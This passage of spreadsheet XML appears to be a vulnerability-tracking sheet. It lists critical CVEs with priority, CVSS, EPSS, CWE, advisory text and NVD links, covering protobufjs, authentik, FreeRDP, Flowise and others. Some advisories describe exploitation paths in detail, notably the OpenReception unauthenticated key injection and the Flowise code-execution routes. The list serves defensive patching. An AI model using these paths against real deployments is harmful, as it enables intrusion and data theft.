      <c r="M368" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-39975</t>
        </is>
      </c>
    </row>
    <row r="369">
      <c r="A369" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B369" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-41242</t>
        </is>
      </c>
      <c r="C369" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D369" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E369" s="5" t="inlineStr"/>
      <c r="F369" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G369" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H369" s="5" t="inlineStr">
        <is>
          <t>protobufjs_project:protobufjs</t>
        </is>
      </c>
      <c r="I369" s="5" t="inlineStr">
        <is>
          <t>2026-04-18</t>
        </is>
      </c>
      <c r="J369" s="5" t="inlineStr"/>
      <c r="K369" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L369" s="5" t="inlineStr">
        <is>
          <t>protobufjs compiles protobuf definitions into JavaScript (JS) functions. In versions prior to 8.0.1 and 7.5.5, attackers can inject arbitrary code in the "type" fields of protobuf definitions, which will then execute during object decoding using that definition. Versions 8.0.1 and 7.5.5 patch the issue.</t>
        </is>
      </c>
      <c r="M369" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-41242</t>
        </is>
      </c>
    </row>
    <row r="370">
      <c r="A370" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B370" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-43114</t>
        </is>
      </c>
      <c r="C370" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D370" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E370" s="5" t="inlineStr"/>
      <c r="F370" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G370" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H370" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I370" s="5" t="inlineStr">
        <is>
          <t>2026-05-06</t>
        </is>
      </c>
      <c r="J370" s="5" t="inlineStr"/>
      <c r="K370" s="5" t="inlineStr">
        <is>
          <t>CWE-480</t>
        </is>
      </c>
      <c r="L370" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
netfilter: nft_set_pipapo_avx2: don't return non-matching entry on expiry
New test case fails unexpectedly when avx2 matching functions are used.
The test first loads a ranomly generated pipapo set
with 'ipv4 . port' key, i.e.  nft -f foo.
This works.  Then, it reloads the set after a flush:
(echo flush set t s; cat foo) | nft -f -
This is expected to work, because its the same set after all and it was
already loaded once.
But with avx2, this fails: nft reports a clashing element.
The reported clash is of following form:
    We successfully re-inserted
      a . b
      c . d
Then we try to insert a . d
avx2 finds the already existing a . d, which (due to 'flush set') is marked
as invalid in the new generation.  It skips the element and moves to next.
Due to incorrect masking, the skip-step finds the next matching
element *only considering the first field*,
i.e. we return the already reinserted "a . b", even though the
last field is different and the entry should not have been matched.
No such error is reported for the generic c implementation (no avx2) or when
the last field has to use the 'nft_pipapo_avx2_lookup_slow' fallback.
Bisection points to
7711f4bb4b36 ("netfilter: nft_set_pipapo: fix range overlap detection")
but that fix merely uncovers this bug.
Before this commit, the wrong element is returned, but erronously
reported as a full, identical duplicate.
The root-cause is too early return in the avx2 match functions.
When we process the last field, we should continue to process data
until the entire input size has been consumed to make sure no stale
bits remain in the map.</t>
        </is>
      </c>
      <c r="M370" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-43114</t>
        </is>
      </c>
    </row>
    <row r="371">
      <c r="A371" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B371" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45272</t>
        </is>
      </c>
      <c r="C371" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D371" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E371" s="5" t="inlineStr"/>
      <c r="F371" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G371" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H371" s="5" t="inlineStr"/>
      <c r="I371" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J371" s="5" t="inlineStr"/>
      <c r="K371" s="5" t="inlineStr">
        <is>
          <t>CWE-829, CWE-94</t>
        </is>
      </c>
      <c r="L371" s="5" t="inlineStr">
        <is>
          <t>MyBooks is an enhanced and easy-to-use personal ebook management web server also known as Talebook. In 3.41.2 and earlier, the AdminSettings.post handler in webserver/handlers/admin.py accepts SOCIAL_AUTH key names without validating quotes or newline characters, and SettingsLoader.dumpfile in webserver/loader.py concatenates those names into the generated Python source file auto.py without escaping them. An administrator can submit a crafted SOCIAL_AUTH key name that closes the settings dictionary and injects arbitrary Python statements. The application later executes those statements because SettingsLoader.loadfile imports auto.py as a module, and setting autoreload to true invokes restart_async so a process supervisor restarts the service and triggers the import. Successful exploitation executes commands with the privileges of the application service account and can disclose data, modify files, establish persistence, or disrupt the service. Related authorization and registration vulnerabilities can reduce the effective privilege requirement in a chained attack, but the standalone vulnerability requires administrator access. This issue is fixed in version 3.42.0.</t>
        </is>
      </c>
      <c r="M371" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45272</t>
        </is>
      </c>
    </row>
    <row r="372">
      <c r="A372" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B372" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48088</t>
        </is>
      </c>
      <c r="C372" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D372" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E372" s="5" t="inlineStr"/>
      <c r="F372" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G372" s="5" t="inlineStr"/>
      <c r="H372" s="5" t="inlineStr"/>
      <c r="I372" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J372" s="5" t="inlineStr"/>
      <c r="K372" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L372" s="5" t="inlineStr">
        <is>
          <t>OpenReception's appointment booking software provides an end-to-end encrypted appointment booking platform. Prior to version 1.0.4, the route `POST /api/tenants/{tenantId}/staff/{staffId}/crypto` accepts and stores attacker-controlled ML-KEM-768 public keys against any tenant on the platform without authentication. The handler logs an "Unauthorized crypto key storage attempt" warning when neither a session nor a registration cookie is present, then proceeds to insert the row regardless. The platform's E2E claim that "even administrators cannot view sensitive information" is broken: any unauthenticated network attacker can register themselves as an additional encryption recipient for any tenant's future patient appointments. A second variant of the bug suppresses the unauthorized-warning log entry. The Zod schema makes the `email` field optional. When the request body omits `email` and the request carries no registration cookie, the comparison `registrationEmail === email` becomes `undefined === undefined`, which evaluates to `true`. The handler treats the request as a legitimate registration flow, skips the warning entirely, and stores the row. Successful storage is still recorded as an `[info]` log line, but the security-relevant warning that operators are most likely to monitor or alert on is gone. The `staff_crypto` table has no unique constraint on `user_id`, so an arbitrary number of attacker rows can coexist for the same staff identifier and all return as `is_active=true`. The supplied `staffId` does not need to match any existing user or pending invite. Schema validation on `passkeyId`, `publicKey`, and `privateKeyShare` is also weak: the literal string `&lt;placeholder-base64&gt;` was accepted, indicating no length, format, or cryptographic-validity check beyond field presence. This weakness is independent of the auth bypass but compounds it: a poisoned directory can also be filled with malformed entries that break legitimate booking flows. The injected key is consumed by the public booking flow. After completing the unauthenticated `bootstrap-challenge` and `bootstrap-verify` ceremony as a "patient", the resulting `bookingAccessToken` is accepted by `GET /api/tenants/{id}/appointments/staff-public-keys`, which returns the attacker-controlled keys alongside any legitimate ones. A new appointment encrypts its tunnel key with ML-KEM to all listed recipients, so the attacker becomes a co-recipient of the encryption and can decapsulate the tunnel key with the matching secret. From there, all appointment payloads for that booking are decryptable. Version 1.0.4 patches the issue.</t>
        </is>
      </c>
      <c r="M372" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48088</t>
        </is>
      </c>
    </row>
    <row r="373">
      <c r="A373" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B373" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50561</t>
        </is>
      </c>
      <c r="C373" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D373" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E373" s="5" t="inlineStr"/>
      <c r="F373" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G373" s="5" t="inlineStr"/>
      <c r="H373" s="5" t="inlineStr"/>
      <c r="I373" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J373" s="5" t="inlineStr"/>
      <c r="K373" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L373" s="5" t="inlineStr">
        <is>
          <t>Yuxi is a large-model-based intelligent knowledge base and knowledge graph agent development platform. Prior to version 0.6.2, the project's authentication mechanism contains a flaw. In affected versions, the system does not sufficiently validate the identity token in the Authorization header — only performing a validity check. This allows an administrator token generated in another deployment instance or local testing environment to be used to access the backend management interfaces of a different affected instance. An attacker who obtains or constructs an acceptable administrator Authorization token may bypass normal login authentication and gain administrator privileges. This vulnerability could allow an attacker to access system configurations, invoke backend management APIs, create administrator accounts, and ultimately take over the system backend. This issue has been fixed in version 0.6.2. Before upgrading, users are advised to implement the following temporary measures: Set the environment variable `JWT_SECRET_KEY` to a non-default value, and configure a unique, sufficiently strong JWT/authentication key for each deployment instance; and/or avoid exposing backend management interfaces directly to the public network.</t>
        </is>
      </c>
      <c r="M373" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50561</t>
        </is>
      </c>
    </row>
    <row r="374">
      <c r="A374" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B374" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52777</t>
        </is>
      </c>
      <c r="C374" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D374" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E374" s="5" t="inlineStr"/>
      <c r="F374" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G374" s="5" t="inlineStr"/>
      <c r="H374" s="5" t="inlineStr"/>
      <c r="I374" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J374" s="5" t="inlineStr"/>
      <c r="K374" s="5" t="inlineStr">
        <is>
          <t>CWE-352, CWE-502</t>
        </is>
      </c>
      <c r="L374" s="5" t="inlineStr">
        <is>
          <t>YesWiki is a wiki system written in PHP. Prior to version 4.6.6, there is an authenticated PHP object injection vulnerability in BazarImportAction via unserialize. This issue has been patched in version 4.6.6.</t>
        </is>
      </c>
      <c r="M374" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52777</t>
        </is>
      </c>
    </row>
    <row r="375">
      <c r="A375" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B375" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57580</t>
        </is>
      </c>
      <c r="C375" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D375" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E375" s="5" t="inlineStr"/>
      <c r="F375" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G375" s="5" t="inlineStr"/>
      <c r="H375" s="5" t="inlineStr"/>
      <c r="I375" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J375" s="5" t="inlineStr"/>
      <c r="K375" s="5" t="inlineStr">
        <is>
          <t>CWE-436</t>
        </is>
      </c>
      <c r="L375" s="5" t="inlineStr">
        <is>
          <t>authentik is an open-source identity provider. Prior to 2026.2.6 and 2026.5.5, an inbound SAML Source configured with the non-default USERNAME_LINK or EMAIL_LINK user-matching mode interprets an XML comment in a NameID differently from the identity provider's signed assertion. An attacker with an account on the source identity provider who can set the account's NameID can inject an XML comment that truncates the value used by authentik to the text before the comment while the signed assertion remains valid. A crafted NameID can therefore truncate to a victim's username or email and bind the attacker's external identity to the victim's existing account. This grants full takeover without the victim's password or the identity provider's private key, and the malicious link persists so later logins succeed without the comment. Sources using the default unique-identifier matching mode and authentik's outbound SAML Provider role are not affected. This issue is fixed in versions 2026.2.6 and 2026.5.5.</t>
        </is>
      </c>
      <c r="M375" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57580</t>
        </is>
      </c>
    </row>
    <row r="376">
      <c r="A376" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B376" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61410</t>
        </is>
      </c>
      <c r="C376" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D376" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E376" s="5" t="inlineStr"/>
      <c r="F376" s="5" t="n">
        <v>0.013</v>
      </c>
      <c r="G376" s="5" t="inlineStr"/>
      <c r="H376" s="5" t="inlineStr"/>
      <c r="I376" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J376" s="5" t="inlineStr"/>
      <c r="K376" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L376" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains a Missing Authorization vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to remote execution. This vulnerability is considered critical because it allows an attacker to execute commands remotely on a target system by sending a specially crafted request to the application, bypassing intended restrictions on code execution.Dell recommends customers to upgrade at the earliest opportunity.</t>
        </is>
      </c>
      <c r="M376" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61410</t>
        </is>
      </c>
    </row>
    <row r="377">
      <c r="A377" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B377" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6223</t>
        </is>
      </c>
      <c r="C377" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D377" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E377" s="5" t="inlineStr"/>
      <c r="F377" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G377" s="5" t="inlineStr"/>
      <c r="H377" s="5" t="inlineStr"/>
      <c r="I377" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J377" s="5" t="inlineStr"/>
      <c r="K377" s="5" t="inlineStr">
        <is>
          <t>CWE-307</t>
        </is>
      </c>
      <c r="L377" s="5" t="inlineStr">
        <is>
          <t>Improper restriction of excessive authentication attempts vulnerability in Bahçelievler Muncipality BiHayat App allows Authentication Bypass.
This issue affects BiHayat App: from 2.1.7 through 07092026. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="M377" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6223</t>
        </is>
      </c>
    </row>
    <row r="378">
      <c r="A378" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B378" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62668</t>
        </is>
      </c>
      <c r="C378" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D378" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E378" s="5" t="inlineStr"/>
      <c r="F378" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G378" s="5" t="inlineStr"/>
      <c r="H378" s="5" t="inlineStr"/>
      <c r="I378" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J378" s="5" t="inlineStr"/>
      <c r="K378" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L378" s="5" t="inlineStr">
        <is>
          <t>Grav API Plugin is a RESTful API for Grav CMS that provides full headless access to your site's content. Prior to 1.0.6, the Grav API plugin WebhookController.php accepts webhook URLs after only FILTER_VALIDATE_URL syntax validation, and WebhookDispatcher.php initializes cURL without CURLOPT_PROTOCOLS or CURLOPT_REDIR_PROTOCOLS restrictions. An account with api.webhooks.write can submit file, dict, gopher, private-network, or link-local targets, retrieve local files and delivery response bodies, and pivot requests to internal services or cloud metadata endpoints. This issue is fixed in version 1.0.6.</t>
        </is>
      </c>
      <c r="M378" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62668</t>
        </is>
      </c>
    </row>
    <row r="379">
      <c r="A379" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B379" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63221</t>
        </is>
      </c>
      <c r="C379" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D379" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E379" s="5" t="inlineStr"/>
      <c r="F379" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G379" s="5" t="inlineStr"/>
      <c r="H379" s="5" t="inlineStr"/>
      <c r="I379" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J379" s="5" t="inlineStr"/>
      <c r="K379" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L379" s="5" t="inlineStr">
        <is>
          <t>CodeIgniter is a PHP full-stack web framework. From 4.3.0 through 4.7.3, Query Builder deleteBatch() substitutes bound values from where() conditions into generated SQL while ignoring their escape flags, allowing user-controlled condition values to be interpreted as SQL. This affects only the deleteBatch() code path. Regular delete() operations escape where() binds correctly. This issue is fixed in version 4.7.4.</t>
        </is>
      </c>
      <c r="M379" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63221</t>
        </is>
      </c>
    </row>
    <row r="380">
      <c r="A380" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B380" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67305</t>
        </is>
      </c>
      <c r="C380" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D380" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E380" s="5" t="inlineStr"/>
      <c r="F380" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G380" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H380" s="5" t="inlineStr">
        <is>
          <t>freerdp:freerdp</t>
        </is>
      </c>
      <c r="I380" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J380" s="5" t="inlineStr"/>
      <c r="K380" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L380" s="5" t="inlineStr">
        <is>
          <t>FreeRDP Windows client before 3.29.0 contains a heap buffer overflow vulnerability in the clipboard virtual channel when processing CLIPRDR_FILE_CONTENTS_RESPONSE PDUs without validating the server-provided size against the destination buffer. A malicious RDP server can send a response with a data payload significantly larger than requested, causing arbitrary heap memory corruption that may enable remote code execution when a user performs a paste operation.</t>
        </is>
      </c>
      <c r="M380" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67305</t>
        </is>
      </c>
    </row>
    <row r="381">
      <c r="A381" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B381" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67330</t>
        </is>
      </c>
      <c r="C381" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D381" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E381" s="5" t="inlineStr"/>
      <c r="F381" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G381" s="5" t="inlineStr"/>
      <c r="H381" s="5" t="inlineStr"/>
      <c r="I381" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J381" s="5" t="inlineStr"/>
      <c r="K381" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L381" s="5" t="inlineStr">
        <is>
          <t>@better-auth/scim (a better-auth plugin) versions &gt;= 1.4.0-beta.27 through &lt;= 1.6.21 and &gt;= 1.7.0-beta.0 through &lt;= 1.7.0-beta.9 contain an authorization bypass. SCIM token issuance did not reject provider IDs already used by existing SSO, SAML, OIDC, generic OAuth, or social account providers, and the same logical provider ID was used for both SCIM provider configuration and account ownership. An authenticated user could mint a SCIM token whose provider ID collided with an existing provider namespace, causing SCIM user routes to resolve account rows the token never provisioned. This allowed listing, reading, updating (including rewriting global profile/email fields without uniqueness checks), and deleting global user accounts and sessions, resulting in account takeover and unauthorized deprovisioning. Fixed in 1.6.22 and 1.7.0-beta.10 (1.7.0-rc.0).</t>
        </is>
      </c>
      <c r="M381" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67330</t>
        </is>
      </c>
    </row>
    <row r="382">
      <c r="A382" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B382" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67336</t>
        </is>
      </c>
      <c r="C382" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D382" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E382" s="5" t="inlineStr"/>
      <c r="F382" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G382" s="5" t="inlineStr"/>
      <c r="H382" s="5" t="inlineStr"/>
      <c r="I382" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J382" s="5" t="inlineStr"/>
      <c r="K382" s="5" t="inlineStr">
        <is>
          <t>CWE-327</t>
        </is>
      </c>
      <c r="L382" s="5" t="inlineStr">
        <is>
          <t>better-auth versions before 1.6.11 contain insecure cryptographic defaults in the oidcProvider and mcp plugins that advertise the none algorithm and accept plain PKCE by default. Attackers can exploit algorithm negotiation to accept unsigned tokens or intercept authorization codes when PKCE plain is used instead of the required S256 method.</t>
        </is>
      </c>
      <c r="M382" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67336</t>
        </is>
      </c>
    </row>
    <row r="383">
      <c r="A383" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B383" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6881</t>
        </is>
      </c>
      <c r="C383" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D383" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E383" s="5" t="inlineStr"/>
      <c r="F383" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G383" s="5" t="inlineStr"/>
      <c r="H383" s="5" t="inlineStr"/>
      <c r="I383" s="5" t="inlineStr">
        <is>
          <t>2026-07-28</t>
        </is>
      </c>
      <c r="J383" s="5" t="inlineStr"/>
      <c r="K383" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L383" s="5" t="inlineStr">
        <is>
          <t>A SQL Injection in the Giving Reports functionality in Ellucian Advance Web and Legacy Advance allows an authenticated attacker to extract sensitive information from databases via a crafted SQL query in the class credit field.
This issue affects Advance Web: all versions; Legacy Advance: all versions.
Ellucian CRM Advance is not impacted.</t>
        </is>
      </c>
      <c r="M383" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6881</t>
        </is>
      </c>
    </row>
    <row r="384">
      <c r="A384" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B384" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69254</t>
        </is>
      </c>
      <c r="C384" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D384" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E384" s="5" t="inlineStr"/>
      <c r="F384" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G384" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H384" s="5" t="inlineStr"/>
      <c r="I384" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J384" s="5" t="inlineStr"/>
      <c r="K384" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L384" s="5" t="inlineStr">
        <is>
          <t>Flowise is a drag &amp; drop user interface to build a customized large language model flow. Prior to 3.1.3, executeJavaScriptCode() accepted caller-provided nodeVMOptions and merged them over the default NodeVM security settings in packages/components/src/utils.ts. An authenticated attacker reaching packages/server/src/routes/node-custom-functions/index.ts could run a custom function that imported flowise-components/dist/src/utils.js, called executeJavaScriptCode() again with nodeVMOptions.require.builtin set to allow all built-in modules, and then required child_process to execute arbitrary system commands as root on the Flowise server. This issue is fixed in version 3.1.3.</t>
        </is>
      </c>
      <c r="M384" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69254</t>
        </is>
      </c>
    </row>
    <row r="385">
      <c r="A385" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B385" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69256</t>
        </is>
      </c>
      <c r="C385" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D385" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E385" s="5" t="inlineStr"/>
      <c r="F385" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G385" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H385" s="5" t="inlineStr"/>
      <c r="I385" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J385" s="5" t="inlineStr"/>
      <c r="K385" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L385" s="5" t="inlineStr">
        <is>
          <t>Flowise is a drag &amp; drop user interface to build a customized large language model flow. Prior to 3.1.3, the CSVAgent node allowed users to provide Python code that is executed through pyodide; although a denylist blocked dangerous Python constructs, pandas.read_pickle() could deserialize a pickled payload and achieve code execution without matching the denied words. The affected file is flowise-components/nodes/agents/CSVAgent/CSVAgent.ts, where user-supplied customReadCSVFunc is evaluated as pd.${customReadCSVFunc}. An authenticated user who can create or modify a chatflow can add a CSV Agent, place a malicious read_pickle payload in the Additional Parameters, save the chatflow, and trigger /api/v1/prediction/&lt;UUID&gt; to execute commands. This issue is fixed in version 3.1.3.</t>
        </is>
      </c>
      <c r="M385" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69256</t>
        </is>
      </c>
    </row>
    <row r="386">
      <c r="A386" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B386" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69259</t>
        </is>
      </c>
      <c r="C386" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D386" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E386" s="5" t="inlineStr"/>
      <c r="F386" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G386" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H386" s="5" t="inlineStr"/>
      <c r="I386" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J386" s="5" t="inlineStr"/>
      <c r="K386" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L386" s="5" t="inlineStr">
        <is>
          <t>Flowise is a drag &amp; drop user interface to build a customized large language model flow. Prior to 3.1.3, the SQLite Record Manager node in packages/components/nodes/recordmanager/SQLiteRecordManager/SQLiteRecordManager.ts accepted user-controlled additionalConfig and spread it after the intended database setting, allowing additionalConfig.database to overwrite the SQLite database path. An authenticated attacker using the published Docker image, which ran as root, could write a SQLite database to paths such as /etc/chromium/exploit.conf; by controlling the table name and namespace value, the attacker could place shell syntax into the database file and trigger execution when Puppeteer launched Chromium and sourced /etc/chromium/*.conf. This issue is fixed in version 3.1.3.</t>
        </is>
      </c>
      <c r="M386" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69259</t>
        </is>
      </c>
    </row>
    <row r="387">
      <c r="A387" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
